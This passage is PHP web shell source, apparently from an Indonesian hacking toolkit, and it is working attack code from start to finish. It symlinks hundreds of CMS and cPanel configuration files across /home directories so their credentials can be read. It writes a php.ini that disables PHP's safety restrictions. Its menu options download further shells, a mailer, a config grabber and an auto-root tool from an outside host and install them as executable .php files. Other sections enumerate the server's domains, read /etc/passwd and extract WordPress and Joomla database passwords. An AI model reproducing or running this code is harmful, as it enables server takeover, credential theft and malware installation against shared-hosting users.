1932@symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
1933@symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
1934@symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
1935@symlink('/home/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
1936@symlink('/home/'.$user.'/public_html/include/db.php',$user.'-7.txt');
1937@symlink('/home/'.$user.'/public_html/connect.php',$user.'-8.txt');
1938@symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
1939@symlink('/home/'.$user.'/public_html/include/config.php',$user.'-12.txt');
1940@symlink('/home/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
1941@symlink('/home/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
1942@symlink('/home/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
1943@symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
1944@symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-vBulletin2.txt');
1945@symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
1946@symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
1947@symlink('/home2/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
1948@symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
1949@symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
1950@symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
1951@symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
1952@symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
1953@symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
1954@symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
1955@symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
1956@symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
1957@symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
1958@symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
1959@symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
1960@symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
1961@symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
1962@symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
1963@symlink('/home2/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
1964@symlink('/home2/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
1965@symlink('/home2/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
1966@symlink('/home2/'.$user.'/public_html/include/db.php',$user.'-7.txt');
1967@symlink('/home2/'.$user.'/public_html/connect.php',$user.'-8.txt');
1968@symlink('/home2/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
1969@symlink('/home2/'.$user.'/public_html/include/config.php',$user.'-12.txt');
1970@symlink('/home2/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
1971@symlink('/home2/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
1972@symlink('/home2/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
1973@symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
1974@symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-vBulletin2.txt');
1975@symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
1976@symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
1977@symlink('/home3/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
1978@symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
1979@symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
1980@symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
1981@symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
1982@symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
1983@symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
1984@symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
1985@symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
1986@symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
1987@symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
1988@symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
1989@symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
1990@symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
1991@symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
1992@symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
1993@symlink('/home3/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
1994@symlink('/home3/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
1995@symlink('/home3/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
1996@symlink('/home3/'.$user.'/public_html/include/db.php',$user.'-7.txt');
1997@symlink('/home3/'.$user.'/public_html/connect.php',$user.'-8.txt');
1998@symlink('/home3/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
1999@symlink('/home3/'.$user.'/public_html/include/config.php',$user.'-12.txt');
2000@symlink('/home3/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
2001@symlink('/home3/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
2002@symlink('/home3/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
2003@symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
2004@symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-vBulletin2.txt');
2005@symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
2006@symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
2007@symlink('/home4/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
2008@symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
2009@symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
2010@symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
2011@symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
2012@symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
2013@symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
2014@symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
2015@symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
2016@symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
2017@symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
2018@symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
2019@symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
2020@symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
2021@symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
2022@symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
2023@symlink('/home4/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
2024@symlink('/home4/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
2025@symlink('/home4/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
2026@symlink('/home4/'.$user.'/public_html/include/db.php',$user.'-7.txt');
2027@symlink('/home4/'.$user.'/public_html/connect.php',$user.'-8.txt');
2028@symlink('/home4/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
2029@symlink('/home4/'.$user.'/public_html/include/config.php',$user.'-12.txt');
2030@symlink('/home4/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
2031@symlink('/home4/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
2032@symlink('/home4/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
2033@symlink('/home5/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
2034@symlink('/home5/'.$user.'/public_html/includes/config.php',$user.'-vBulletin2.txt');
2035@symlink('/home5/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
2036@symlink('/home5/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
2037@symlink('/home5/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
2038@symlink('/home5/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
2039@symlink('/home5/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
2040@symlink('/home5/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
2041@symlink('/home5/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
2042@symlink('/home5/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
2043@symlink('/home5/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
2044@symlink('/home5/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
2045@symlink('/home5/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
2046@symlink('/home5/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
2047@symlink('/home5/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
2048@symlink('/home5/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
2049@symlink('/home5/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
2050@symlink('/home5/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
2051@symlink('/home5/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
2052@symlink('/home5/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
2053@symlink('/home5/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
2054@symlink('/home5/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
2055@symlink('/home5/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
2056@symlink('/home5/'.$user.'/public_html/include/db.php',$user.'-7.txt');
2057@symlink('/home5/'.$user.'/public_html/connect.php',$user.'-8.txt');
2058@symlink('/home5/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
2059@symlink('/home5/'.$user.'/public_html/include/config.php',$user.'-12.txt');
2060@symlink('/home5/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
2061@symlink('/home5/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
2062@symlink('/home5/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
2063@symlink('/home6/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
2064@symlink('/home6/'.$user.'/public_html/includes/config.php',$user.'-vBulletin2.txt');
2065@symlink('/home6/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
2066@symlink('/home6/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
2067@symlink('/home6/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
2068@symlink('/home6/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
2069@symlink('/home6/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
2070@symlink('/home6/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
2071@symlink('/home6/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
2072@symlink('/home6/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
2073@symlink('/home6/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
2074@symlink('/home6/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
2075@symlink('/home6/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
2076@symlink('/home6/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
2077@symlink('/home6/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
2078@symlink('/home6/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
2079@symlink('/home6/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
2080@symlink('/home6/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
2081@symlink('/home6/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
2082@symlink('/home6/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
2083@symlink('/home6/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
2084@symlink('/home6/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
2085@symlink('/home6/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
2086@symlink('/home6/'.$user.'/public_html/include/db.php',$user.'-7.txt');
2087@symlink('/home6/'.$user.'/public_html/connect.php',$user.'-8.txt');
2088@symlink('/home6/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
2089@symlink('/home6/'.$user.'/public_html/include/config.php',$user.'-12.txt');
2090@symlink('/home6/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
2091@symlink('/home6/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
2092@symlink('/home6/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
2093@symlink('/home7/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
2094@symlink('/home7/'.$user.'/public_html/includes/config.php',$user.'-vBulletin2.txt');
2095@symlink('/home7/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
2096@symlink('/home7/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
2097@symlink('/home7/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
2098@symlink('/home7/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
2099@symlink('/home7/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
2100@symlink('/home7/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
2101@symlink('/home7/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
2102@symlink('/home7/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
2103@symlink('/home7/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
2104@symlink('/home7/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
2105@symlink('/home7/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
2106@symlink('/home7/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
2107@symlink('/home7/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
2108@symlink('/home7/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
2109@symlink('/home7/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
2110@symlink('/home7/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
2111@symlink('/home7/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
2112@symlink('/home7/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
2113@symlink('/home7/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
2114@symlink('/home7/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
2115@symlink('/home7/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
2116@symlink('/home7/'.$user.'/public_html/include/db.php',$user.'-7.txt');
2117@symlink('/home7/'.$user.'/public_html/connect.php',$user.'-8.txt');
2118@symlink('/home7/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
2119@symlink('/home7/'.$user.'/public_html/include/config.php',$user.'-12.txt');
2120@symlink('/home7/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
2121@symlink('/home7/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
2122@symlink('/home7/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
2123@symlink('/home/'.$user.'/.my.cnf',$user.'-cpanel.txt');
2124@symlink('/home/'.$user.'/.accesshash',$user.'-whm.txt');
2125@symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-opencart.txt');
2126@symlink('/home/'.$user.'/public_html/slconfig.php',$user.'-sitelok.txt');
2127@symlink('/home/'.$user.'/public_html/application/config/database.php',$user.'-elislab.txt');
2128@symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-mangentot.txt');
2129@symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.'-lokmed.txt');
2130@symlink('/home/'.$user.'/public_html/po-library/po-config.php',$user.'-popojembut.txt');
2131@symlink('/home/'.$user.'/public_html/lokomedia/config/koneksi.php',$user.'-lokmed.txt');
2132@symlink('/home1/'.$user.'/.accesshash',$user.'-whm.txt');
2133@symlink('/home1/'.$user.'/public_html/admin/config.php',$user.'-opencart.txt');
2134@symlink('/home1/'.$user.'/public_html/slconfig.php',$user.'-sitelok.txt');
2135@symlink('/home1/'.$user.'/public_html/application/config/database.php',$user.'-elislab.txt');
2136@symlink('/home1/'.$user.'/public_html/app/etc/local.xml',$user.'-mangentot.txt');
2137@symlink('/home1/'.$user.'/public_html/config/koneksi.php',$user.'-lokmed.txt');
2138@symlink('/home1/'.$user.'/public_html/po-library/po-config.php',$user.'-popojembut.txt');
2139@symlink('/home1/'.$user.'/public_html/lokomedia/config/koneksi.php',$user.'-lokmed.txt');
2140}
2141echo '<center>Selesai mas/mba bro untuk melihat hasilnya klik -> <blink><a href='.$folfig.'>'.$folfig.'</a></blink>';
2142
2143}
2144}
2145
2146?>
2147<?php
2148if (isset($_GET['idb']) && ($_GET['idb'] == 'auto')) {
2149?>
2150<form action="?&idb=auto" method="post">
2151<?php
2152echo "<html><head><title>MATAMU PICEK !!!!</title>";
2153echo "<body bgcolor='black'>";
2154echo "<font color='yellow'><center>-=[ IDBTE4M ]=- -=[ HGL10]=- -=[ BN ]=-</center></font><br/><br/><form method='POST'>";
2155echo "<div align='center'>";
2156echo "<input type='submit' name='idb' value='IJIN SERVER'><br/> <br/>";
2157echo "</div>";
2158echo "<div align='center'>";
2159echo "<input type='submit' name='te4m' value='-=[ Dm Shell ]=-'> ";
2160echo "<input type='submit' name='te4m1' value='-=[ IndoXploit Shell ]=-'> ";
2161echo "<input type='submit' name='te4m2' value='-=[ Mailer ]=-'> ";
2162echo "<input type='submit' name='te4m3' value='-=[ Config Grabber ]=-'> ";
2163echo "<input type='submit' name='te4m4' value='-=[ Vhosts Grabber ]=-'><br> ";
2164echo "<input type='submit' name='te4m5' value='-=[ Auto Root ]=-'>";
2165echo "<input type='submit' name='te4m6' value='-=[ Sc Depes ]=-'>";
2166echo "</div>";
2167
2168
2169$sh = 'file_get_contents';
2170
2171if($_POST['idb']) {
2172$ini = "php.ini";
2173$open = fopen($ini, 'w');
2174$source = ("safe_mode = OFF n
2175disable_functions = NONE n
2176safe_mode_gid = OFF n
2177open_basedir = OFF n
2178register_globals = ON n
2179exec = ON n
2180shell_exec = ON n");
2181fwrite($open, $source);
2182echo "<font color='lime'>";
2183if($open) {
2184echo '<hr><p>ijin diterima, silahkan pilih tools sesuai keinginan :) </p>';
2185}
2186else {
2187echo "<font color='red'>";
2188echo '<hr><p>GAGAL kang </p>';
2189echo "</font>";
2190fclose($open);
2191} }
2192
2193if($_POST['te4m']) {
2194$cgi = 'http://www.cbihost.net/wp-includes/ID3/css/dm.css';
2195$get11 = $sh($cgi);
2196$idbk = fopen('dm.php', 'w');
2197fwrite($idbk,$get11);
2198fclose($idbk);
2199{
2200@chmod('dm.php',0755);
2201}
2202echo "<font color='aqua'>";
2203echo "<hr>shell dm sukses dibuat :D <br/>
2204Silahkan kunjungi http://alamat-domain-kamu/dm.php atau lihat hasilnya <a href='dm.php' target='_blank'>DISINI</a></center></br>";
2205echo "</font>";
2206}
2207echo "</font>";
2208
2209if($_POST['te4m1']) {
2210$cgi = 'http://www.cbihost.net/wp-includes/ID3/css/indro.css';
2211$get11 = $sh($cgi);
2212$idbk = fopen('indo.php', 'w');
2213fwrite($idbk,$get11);
2214fclose($idbk);
2215{
2216@chmod('indo.php',0755);
2217}
2218echo "<font color='aqua'>";
2219echo "<hr>tools sukses dibuat :D <br/>
2220Silahkan kunjungi http://alamat-domain-kamu/indo.php atau lihat hasilnya <a href='indo.php' target='_blank'>DISINI</a></center></br>";
2221echo "</font>";
2222}
2223echo "</font>";
2224
2225if($_POST['te4m2']) {
2226$cgi = 'http://www.cbihost.net/wp-includes/ID3/css/m.css';
2227$get11 = $sh($cgi);
2228$idbk = fopen('mail.php', 'w');
2229fwrite($idbk,$get11);
2230fclose($idbk);
2231{
2232@chmod('mail.php',0755);
2233}
2234echo "<font color='aqua'>";
2235echo "<hr>mailer sukses dibuat :D <br/>
2236Silahkan kunjungi http://alamat-domain-kamu/mail.php atau lihat hasilnya <a href='mail.php' target='_blank'>DISINI</a></center></br>";
2237echo "</font>";
2238}
2239echo "</font>";
2240
2241if($_POST['te4m3']) {
2242$cgi = 'http://www.cbihost.net/wp-includes/ID3/css/f.css';
2243$get11 = $sh($cgi);
2244$idbk = fopen('cf.php', 'w');
2245fwrite($idbk,$get11);
2246fclose($idbk);
2247{
2248@chmod('cf.php',0755);
2249}
2250echo "<font color='aqua'>";
2251echo "<hr>Config grab sukses dibuat :D <br/>
2252Silahkan kunjungi http://alamat-domain-kamu/cf.php atau lihat hasilnya <a href='cf.php' target='_blank'>DISINI</a></center></br>";
2253echo "</font>";
2254}
2255echo "</font>";
2256if($_POST['te4m5']) {
2257$cgi = 'http://www.cbihost.net/wp-includes/ID3/css/v.css';
2258$get11 = $sh($cgi);
2259$idbk = fopen('vh.php', 'w');
2260fwrite($idbk,$get11);
2261fclose($idbk);
2262{
2263@chmod('vh.php',0755);
2264}
2265echo "<font color='aqua'>";
2266echo "<hr>Vhosts Grabber<br/>
2267Silahkan kunjungi http://alamat-domain-kamu/sabun.php atau lihat hasilnya <a href='vh.php' target='_blank'>DISINI</a></center></br>";
2268echo "</font>";
2269}
2270echo "</font>";
2271if($_POST['te4m6']) {
2272$cgi = 'http://www.cbihost.net/wp-includes/ID3/css/p.css';
2273$get11 = $sh($cgi);
2274$idbk = fopen('ar.php', 'w');
2275fwrite($idbk,$get11);
2276fclose($idbk);
2277{
2278@chmod('ar.php',0755);
2279}
2280echo "<font color='aqua'>";
2281echo "<hr>Auto root<br/>
2282Silahkan kunjungi http://alamat-domain-kamu/bn.php atau lihat hasilnya <a href='ar.php' target='_blank'>DISINI</a></center></br>";
2283echo "</font>";
2284}
2285echo "</font>";
2286if($_POST['te4m4']) {
2287$cgi = 'http://www.cbihost.net/wp-includes/ID3/css/depess.css';
2288$get11 = $sh($cgi);
2289$idb1k = fopen('idb.php', 'w');
2290fwrite($idb1k,$get11);
2291fclose($idb1k);
2292{
2293@chmod('idb.php',0755);
2294}
2295echo "<font color='aqua'>";
2296echo "<hr>CGIProxy sukses dibuat :D <br/>
2297Silahkan kunjungi http://alamat-domain-kamu/.pl atau lihat hasilnya <a href='idb.php' target='_blank'>DISINI</a></center></br>";
2298echo "</font>";
2299}
2300echo "</font>";
2301}
2302?>
2303
2304<?php
2305if (isset($_GET['idb']) && ($_GET['idb'] == 'wp2')) { ?>
2306<form action="?idb=wp2" method="post">
2307<?php
2308@ini_set('display_errors',0);
2309function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
2310 $ar0=explode($marqueurDebutLien, $text);
2311 $ar1=explode($marqueurFinLien, $ar0[$i]);
2312 return trim($ar1[0]);
2313}
2314
2315echo "<center>";
2316$d0mains = @file('/etc/named.conf');
2317$domains = scandir("/var/named");
2318
2319if ($domains or $d0mains)
2320{
2321 $domains = scandir("/var/named");
2322 if($domains) {
2323echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> wp-config </th></tr>";
2324$count=1;
2325$dc = 0;
2326$list = scandir("/var/named");
2327foreach($list as $domain){
2328if(strpos($domain,".db")){
2329$domain = str_replace('.db','',$domain);
2330$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2331$dirz = '/home/'.$owner['name'].'/public_html/wp-config.php';
2332$path = getcwd();
2333
2334if (is_readable($dirz)) {
2335copy($dirz, ''.$path.'/-wp-'.$owner['name'].'.txt');
2336$p=file_get_contents(''.$path.'/-wp-'.$owner['name'].'.txt');
2337$password=entre2v2($p,'password="','"');
2338echo "<tr><td>".$count++."</td><td><a href='http://".$domain."/wp-login.php' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='-wp-".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
2339$dc++;
2340}
2341
2342}
2343}
2344echo '</table>';
2345$total = $dc;
2346echo '<br><div class="result">Wp config Found = '.$total.'</h3><br />';
2347echo '</center>';
2348}else{
2349$d0mains = @file('/etc/named.conf');
2350 if($d0mains) {
2351echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> wp-config </th></tr>";
2352$count=1;
2353$dc = 0;
2354$mck = array();
2355foreach($d0mains as $d0main){
2356 if(@eregi('zone',$d0main)){
2357 preg_match_all('#zone "(.*)"#',$d0main,$domain);
2358 flush();
2359 if(strlen(trim($domain[1][0])) >2){
2360 $mck[] = $domain[1][0];
2361 }
2362 }
2363}
2364$mck = array_unique($mck);
2365$usr = array();
2366$dmn = array();
2367foreach($mck as $o) {
2368 $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
2369 $usr[] = $infos['name'];
2370 $dmn[] = $o;
2371}
2372array_multisort($usr,$dmn);
2373$dt = file('/etc/passwd');
2374$passwd = array();
2375foreach($dt as $d) {
2376 $r = explode(':',$d);
2377 if(strpos($r[5],'home')) {
2378 $passwd[$r[0]] = $r[5];
2379 }
2380}
2381$l=0;
2382$j=1;
2383foreach($usr as $r) {
2384$dirz = '/home/'.$r.'/public_html/wp-config.php';
2385$path = getcwd();
2386if (is_readable($dirz)) {
2387copy($dirz, ''.$path.'/-wp-'.$r.'.txt');
2388$p=file_get_contents(''.$path.'/-wp-'.$r.'.txt');
2389$password=entre2v2($p,'password="','"');
2390echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='-wp-".$r.".txt' target='_blank'>Click Here</a></td></tr>";
2391$dc++;
2392 flush();
2393 $l=$l?0:1;
2394 $j++;
2395 }
2396 }
2397 }
2398echo '</table>';
2399$total = $dc;
2400echo '<br><div class="result">Total config Found = '.$total.'</h3><br />';
2401echo '</center>';
2402
2403}
2404}else{
2405echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
2406}
2407echo "<center>";
2408$d0mains = @file('/etc/named.conf');
2409$domains = scandir("/var/named");
2410
2411if ($domains or $d0mains)
2412{
2413 $domains = scandir("/var/named");
2414 if($domains) {
2415echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> config </th></tr>";
2416$count=1;
2417$dc = 0;
2418$list = scandir("/var/named");
2419foreach($list as $domain){
2420if(strpos($domain,".db")){
2421$domain = str_replace('.db','',$domain);
2422$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2423$dirz = '/home/'.$owner['name'].'/public_html/configuration.php';
2424$path = getcwd();
2425
2426if (is_readable($dirz)) {
2427copy($dirz, ''.$path.'/-jomblo-'.$owner['name'].'.txt');
2428$p=file_get_contents(''.$path.'/-jomblo-'.$owner['name'].'.txt');
2429$password=entre2v2($p,'password="','"');
2430echo "<tr><td>".$count++."</td><td><a href='http://".$domain."/wp-login.php' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='-jomblo-".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
2431$dc++;
2432}
2433
2434}
2435}
2436echo '</table>';
2437$total = $dc;
2438echo '<br><div class="result">Total config Found = '.$total.'</h3><br />';
2439echo '</center>';
2440}else{
2441$d0mains = @file('/etc/named.conf');
2442 if($d0mains) {
2443echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> config </th></tr>";
2444$count=1;
2445$dc = 0;
2446$mck = array();
2447foreach($d0mains as $d0main){
2448 if(@eregi('zone',$d0main)){
2449 preg_match_all('#zone "(.*)"#',$d0main,$domain);
2450 flush();
2451 if(strlen(trim($domain[1][0])) >2){
2452 $mck[] = $domain[1][0];
2453 }
2454 }
2455}
2456$mck = array_unique($mck);
2457$usr = array();
2458$dmn = array();
2459foreach($mck as $o) {
2460 $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
2461 $usr[] = $infos['name'];
2462 $dmn[] = $o;
2463}
2464array_multisort($usr,$dmn);
2465$dt = file('/var/named');
2466$passwd = array();
2467foreach($dt as $d) {
2468 $r = explode(':',$d);
2469 if(strpos($r[5],'home')) {
2470 $passwd[$r[0]] = $r[5];
2471 }
2472}
2473$l=0;
